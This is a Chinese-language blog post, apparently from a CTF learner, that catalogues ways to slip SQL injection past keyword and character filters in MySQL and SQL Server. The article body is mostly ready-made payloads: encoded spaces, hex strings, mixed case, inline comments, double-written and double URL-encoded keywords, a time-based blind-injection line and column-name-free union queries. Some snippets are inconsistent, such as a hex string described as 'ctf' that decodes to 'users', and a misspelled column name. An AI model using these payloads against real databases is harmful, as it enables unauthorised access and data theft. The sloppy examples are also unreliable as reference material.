

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/unjoke.jpg">
  <link rel="icon" href="/img/unjoke.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="unjoke">
  <meta name="keywords" content="">
  
    <meta name="description" content="过滤空格 使用注释符&#x2F;**&#x2F;绕过1select&#x2F;**&#x2F;name&#x2F;**&#x2F;from&#x2F;**&#x2F;table  使用url编码绕过1%0a	空格的url编码  使用浮点数绕过123select * from users where id&#x3D;8E0union select 1,2,3等价于select * from users where id&#x3D;8.0 union select 1,2,3">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL关键字绕过">
<meta property="og:url" content="http://example.com/2024/08/24/SQL%E5%85%B3%E9%94%AE%E5%AD%97%E7%BB%95%E8%BF%87/index.html">
<meta property="og:site_name" content="unjoke">
<meta property="og:description" content="过滤空格 使用注释符&#x2F;**&#x2F;绕过1select&#x2F;**&#x2F;name&#x2F;**&#x2F;from&#x2F;**&#x2F;table  使用url编码绕过1%0a	空格的url编码  使用浮点数绕过123select * from users where id&#x3D;8E0union select 1,2,3等价于select * from users where id&#x3D;8.0 union select 1,2,3">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/11.jpg">
<meta property="article:published_time" content="2024-08-24T03:34:01.773Z">
<meta property="article:modified_time" content="2024-11-01T01:15:31.953Z">
<meta property="article:author" content="unjoke">
<meta property="article:tag" content="web技术总结">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/11.jpg">
  
  
  
  <title>SQL关键字绕过 - unjoke</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>unjoke house</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/13.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="SQL关键字绕过"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-08-24 11:34" pubdate>
          2024年8月24日 中午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          10 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">SQL关键字绕过</h1>
            
            
              <div class="markdown-body">
                
                <p><a name="grCSa"></a></p>
<h1 id="过滤空格"><a href="#过滤空格" class="headerlink" title="过滤空格"></a>过滤空格</h1><p><a name="a898fd9e"></a></p>
<h3 id="使用注释符-绕过"><a href="#使用注释符-绕过" class="headerlink" title="使用注释符&#x2F;**&#x2F;绕过"></a>使用注释符&#x2F;**&#x2F;绕过</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span><span class="hljs-comment">/**/</span>name<span class="hljs-comment">/**/</span><span class="hljs-keyword">from</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">table</span><br></code></pre></td></tr></table></figure>
<p><a name="1a6aa243"></a></p>
<h3 id="使用url编码绕过"><a href="#使用url编码绕过" class="headerlink" title="使用url编码绕过"></a>使用url编码绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plsql">%0a	空格的url编码<br></code></pre></td></tr></table></figure>
<p><a name="e3493b77"></a></p>
<h3 id="使用浮点数绕过"><a href="#使用浮点数绕过" class="headerlink" title="使用浮点数绕过"></a>使用浮点数绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plsql">select * from users where id=8E0union select 1,2,3<br>等价于<br>select * from users where id=8.0 union select 1,2,3<br></code></pre></td></tr></table></figure>
<p><a name="38cabe68"></a></p>
<h3 id="使用NULL值绕过"><a href="#使用NULL值绕过" class="headerlink" title="使用NULL值绕过"></a>使用NULL值绕过</h3><p>\N表示空</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plsql">select * from users where id=\Nunion select 1,2,3;<br>等价于<br>select * from users where id=1 union select 1,2,3;<br></code></pre></td></tr></table></figure>
<p><a name="UAJE4"></a></p>
<h3 id="使用两个空格替代一个空格，使用Tab替代空格"><a href="#使用两个空格替代一个空格，使用Tab替代空格" class="headerlink" title="使用两个空格替代一个空格，使用Tab替代空格"></a>使用两个空格替代一个空格，使用Tab替代空格</h3><p><a name="TO9I0"></a></p>
<h3 id="使用括号绕过"><a href="#使用括号绕过" class="headerlink" title="使用括号绕过"></a>使用括号绕过</h3><p>括号没有被过滤，可以用括号绕过。 在MySQL中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来。而括号的两端，可以没有多余的空格。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plsql">select(user())from ctf where(1=1)and(2=2)<br>时间盲注的情况下比较常见<br>?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))--+<br></code></pre></td></tr></table></figure>

<p><a name="Lk7U1"></a></p>
<h1 id="过滤引号"><a href="#过滤引号" class="headerlink" title="过滤引号"></a>过滤引号</h1><p><a name="zOtNV"></a></p>
<h3 id="使用16进制绕过"><a href="#使用16进制绕过" class="headerlink" title="使用16进制绕过"></a>使用16进制绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plsql">select column_name  from information_schema.tables where table_name=&quot;ctf&quot;<br>将ctf用16进制表示之后<br>select column_name  from information_schema.tables where table_name=0x7573657273<br></code></pre></td></tr></table></figure>

<p><a name="gn0US"></a></p>
<h1 id="过滤逗号"><a href="#过滤逗号" class="headerlink" title="过滤逗号"></a>过滤逗号</h1><p><a name="EGndd"></a></p>
<h3 id="使用from语句绕过"><a href="#使用from语句绕过" class="headerlink" title="使用from语句绕过"></a>使用from语句绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plsql">select substr(database() from 1 for 1);<br>select mid(database() from 1 for 1);<br></code></pre></td></tr></table></figure>
<p><a name="Tq4EU"></a></p>
<h3 id="使用join绕过"><a href="#使用join绕过" class="headerlink" title="使用join绕过"></a>使用join绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plsql">union select 1,2<br>等价于<br>union select * from (select 1)a join (select 2)b<br></code></pre></td></tr></table></figure>
<p><a name="P87OL"></a></p>
<h3 id="使用like绕过"><a href="#使用like绕过" class="headerlink" title="使用like绕过"></a>使用like绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plsql">select ascii(mid(user(),1,1))=80   <br>等价于<br>select user() like &#x27;r%&#x27;<br></code></pre></td></tr></table></figure>
<p>%类似于一个通配符</p>
<p><a name="IcHK7"></a></p>
<h3 id="使用offset绕过"><a href="#使用offset绕过" class="headerlink" title="使用offset绕过"></a>使用offset绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plsql">select * from news limit 0,1<br>等价于<br>select * from news limit 1 offset 0<br></code></pre></td></tr></table></figure>
<p><a name="joIj3"></a></p>
<h1 id="过滤注释符"><a href="#过滤注释符" class="headerlink" title="过滤注释符"></a>过滤注释符</h1><p><a name="OftuQ"></a></p>
<h3 id="过滤注释符绕过"><a href="#过滤注释符绕过" class="headerlink" title="过滤注释符绕过"></a>过滤注释符绕过</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-comment">--+   #   %23   --%20</span><br></code></pre></td></tr></table></figure>
<p>绕过方法</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27; and &#x27;</span><span class="hljs-number">1</span><span class="hljs-string">&#x27;=&#x27;</span><span class="hljs-number">1</span><br></code></pre></td></tr></table></figure>
<p><a name="ddN0S"></a></p>
<h1 id="过滤等号"><a href="#过滤等号" class="headerlink" title="过滤等号"></a>过滤等号</h1><p><strong>使用like 、rlike 、regexp</strong><br><a name="YDmsO"></a></p>
<h1 id="过滤or-and-xor-not"><a href="#过滤or-and-xor-not" class="headerlink" title="过滤or and xor not"></a>过滤or and xor not</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plsql">and=&#x27;&amp;&amp;&#x27;  <br>or=&#x27;||&#x27;   <br>xor=&#x27;|&#x27;   <br>not=&#x27;!&#x27; //感叹号<br></code></pre></td></tr></table></figure>
<p><a name="lfwQS"></a></p>
<h1 id="过滤union-select"><a href="#过滤union-select" class="headerlink" title="过滤union select"></a>过滤union select</h1><p><a name="CRXda"></a></p>
<h3 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plsql">id=1&#x27; UniON sElect<br></code></pre></td></tr></table></figure>
<p><a name="DHhc5"></a></p>
<h3 id="内联注释"><a href="#内联注释" class="headerlink" title="内联注释"></a>内联注释</h3><p>MySQL会执行放在&#x2F;!…&#x2F;中的语句。例如：<code>/*!select*/*/*!from*/users;</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plsql">id=-1&#x27; /*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*!information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#<br></code></pre></td></tr></table></figure>
<p><a name="oXikH"></a></p>
<h3 id="双写关键字"><a href="#双写关键字" class="headerlink" title="双写关键字"></a>双写关键字</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plsql">id=-1&#x27; union selselectect 1,2,3–-+<br></code></pre></td></tr></table></figure>

<p><a name="WHUPX"></a></p>
<h3 id="双重URL编码绕过"><a href="#双重URL编码绕过" class="headerlink" title="双重URL编码绕过"></a>双重URL编码绕过</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">id=<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> union ses%<span class="hljs-number">256</span>cect <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-title function_ invoke__">database</span>()<br></code></pre></td></tr></table></figure>
<p>通过将select进行双重编码绕过了select关键字过滤，获取了数据库的信息<br><a name="6503d8e2"></a></p>
<h3 id="十六进制编码绕过"><a href="#十六进制编码绕过" class="headerlink" title="十六进制编码绕过"></a>十六进制编码绕过</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php">MySQL数据库可以识别十六进制,会对十六进制的数据进行自动转换<br> <br>    <br>---&gt;【dvwa-medium-sql】<br>id=<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> union select <span class="hljs-number">1</span>,<span class="hljs-title function_ invoke__">group_concat</span>(table_name),<span class="hljs-number">3</span> <span class="hljs-keyword">from</span> information_schema.tables where table_gchema=<span class="hljs-number">0x6374667377696b69</span><br></code></pre></td></tr></table></figure>
<p><a name="3e3ac001"></a></p>
<h3 id="Unicode编码绕过"><a href="#Unicode编码绕过" class="headerlink" title="Unicode编码绕过"></a>Unicode编码绕过</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php">IIS中间件可以识别Unicode字符,当URL中存在Unicode字符时,IIS中间件会自动对Unicode字符进行转换<br>    <br>---&gt;SqlServer数据库<br>  id=<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">0</span> &lt; (se<span class="hljs-variable">$u006cect</span> top <span class="hljs-number">1</span> name <span class="hljs-keyword">from</span> sec.dbo.sysobjects where xtype=<span class="hljs-string">&#x27;U&#x27;</span>)<br></code></pre></td></tr></table></figure>
<p><a name="1c927fa4"></a></p>
<h3 id="ASCII编码绕过"><a href="#ASCII编码绕过" class="headerlink" title="ASCII编码绕过"></a>ASCII编码绕过</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">SQL Server数据库的char函数可以将字符转换为ASCII码,这样也可以绕过单引号转义的情况。<br></code></pre></td></tr></table></figure>

<p><a name="h0F2J"></a></p>
<h1 id="等价函数"><a href="#等价函数" class="headerlink" title="等价函数"></a>等价函数</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php">可以用以下等价函数代替来绕过过滤:<br><span class="hljs-number">1</span>、sleep函数可以用benchmark函数代替<br><span class="hljs-number">2</span>、ascii函数可以用hex, bin函数代替<br><span class="hljs-number">3</span>、group_concat函数可以用concat_ws函数代替<br><span class="hljs-number">4</span>、updatexml函数可以用extractvalue函数代替<br></code></pre></td></tr></table></figure>
<p><a name="VbZ6k"></a></p>
<h1 id="绕过information"><a href="#绕过information" class="headerlink" title="绕过information"></a>绕过information</h1><p><a name="028fe7c5"></a></p>
<h4 id="InnoDb引擎"><a href="#InnoDb引擎" class="headerlink" title="InnoDb引擎"></a>InnoDb引擎</h4><p>而在MYSQL5.6以上的版本中，inndb增加了<code>innodb_index_stats</code>和<code>innodb_table_stats</code>两张表（mysql.innodb_table_stats），这两张表中都存储了数据库和其数据表的信息，但是没有存储列名<br><a name="FqyJh"></a></p>
<h4 id="sys数据库"><a href="#sys数据库" class="headerlink" title="sys数据库"></a>sys数据库</h4><p>在5.7以上的MYSQL中，新增了sys数据库。可以通过其中的<code>schema_auto_increment_columns</code><br>（sys.schema_auto_increment_columns）来获取表名。</p>
<p>但是上述两种方法都只能查出表名，无法查到列名，这时我们就要用到无列名注入<br><a name="I2Mn0"></a></p>
<h3 id="无列名注入"><a href="#无列名注入" class="headerlink" title="无列名注入"></a>无列名注入</h3><p><a name="O7Io4"></a></p>
<h4 id="无列名注入原理"><a href="#无列名注入原理" class="headerlink" title="无列名注入原理"></a>无列名注入原理</h4><p>无列名注入的原理就是联合查询创建虚拟数据。可以看作将我们不知道的列名进行取别名操作，在取别名的同时进行数据查询，所以查询字段数一定要相同，如果我们查询的字段多于数据表中列的时候，就会出现报错<br><a name="R0igr"></a></p>
<h4 id="实战演示"><a href="#实战演示" class="headerlink" title="实战演示"></a>实战演示</h4><p>正常查users表的数据是<code>select * from users;</code><br><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1724400806201-46441eee-2fc6-445a-8b91-d679c4a49770.png" srcset="/img/loading.gif" lazyload><br>如果你的查询语句是 <code>select 1,2,3 union select * from users where id=1;</code><br>mysql数据库就会生成一个虚拟的表<br><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1724401014574-7804b698-4d76-427e-ba70-db7e6c649318.png" srcset="/img/loading.gif" lazyload><br>那么就可以将查询的列改成1，2，3<br>使用语句<code>select </code>2<code> from (select 1,2,3 union select * from users where id=1)a;</code><br>这条sql语句在联合查询创建虚拟表a，在创建虚拟列1,2,3的同时查询虚拟表第二列的数据<br><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1724401215548-23db710c-f7ea-4d0d-9365-c4ceaf03c4ca.png" srcset="/img/loading.gif" lazyload><br>差多列的时候 <code>select group_concat(</code>1<code>,</code>2<code>) from (select 1,2,3 union select * from users where id=1)a;</code><br><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1724401413128-77f5e455-9694-49e9-829b-562b1469d770.png" srcset="/img/loading.gif" lazyload><br>如果反引号被ban了，可以使用如下语句<br><code>select 1 as a,2 as b,3 as c union select * from users where id=1;</code>看下效果<br><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1724401564878-6c19d495-5821-4177-8f24-2b564debc780.png" srcset="/img/loading.gif" lazyload><br>接下来查询语句就变成了<br><code>select b from(select 1 as a,2 as b,3 as c union select * from users where id=1)a;</code><br>不过多演示<br><a name="MpKmz"></a></p>
<h4 id="join无列明注入"><a href="#join无列明注入" class="headerlink" title="join无列明注入"></a>join无列明注入</h4><p>通过JOIN建立两个表之间的内连接，也就是说将两张表的列名给加起来，可能会爆出相同的列的名字，我们利用的就是这个特性来爆出列名，比如<br><code>select * from (select * from users as a join users as b)a;</code><br><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1724401887391-16601555-b53a-410b-8a50-c7603e0116b8.png" srcset="/img/loading.gif" lazyload><br>现在得到了第一个列名，那么用接下来这个语句来爆出第二个<br><code>select * from (select * from users as a join users as b using(id))a;</code><br><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1724402044636-8637d63e-6b22-496b-af66-4771c078f327.png" srcset="/img/loading.gif" lazyload><br>然后在爆出第三个，以此类推<br><code>select * from (select * from users as a join users as b using(id,username))a;</code><br><img src="https://raw.githubusercontent.com/unjoke/imjoke/img/1724402086401-ce87a813-dbb8-4bfe-958b-52f5f45efcbf.png" srcset="/img/loading.gif" lazyload></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" class="category-chain-item">网络安全</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/web%E6%8A%80%E6%9C%AF%E6%80%BB%E7%BB%93/" class="print-no-link">#web技术总结</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>SQL关键字绕过</div>
      <div>http://example.com/2024/08/24/SQL关键字绕过/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>unjoke</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年8月24日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/12/01/session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" title="session反序列化">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">session反序列化</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/08/18/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%EF%BC%88%E4%B8%80%EF%BC%89/" title="PHP反序列化（一）">
                        <span class="hidden-mobile">PHP反序列化（一）</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
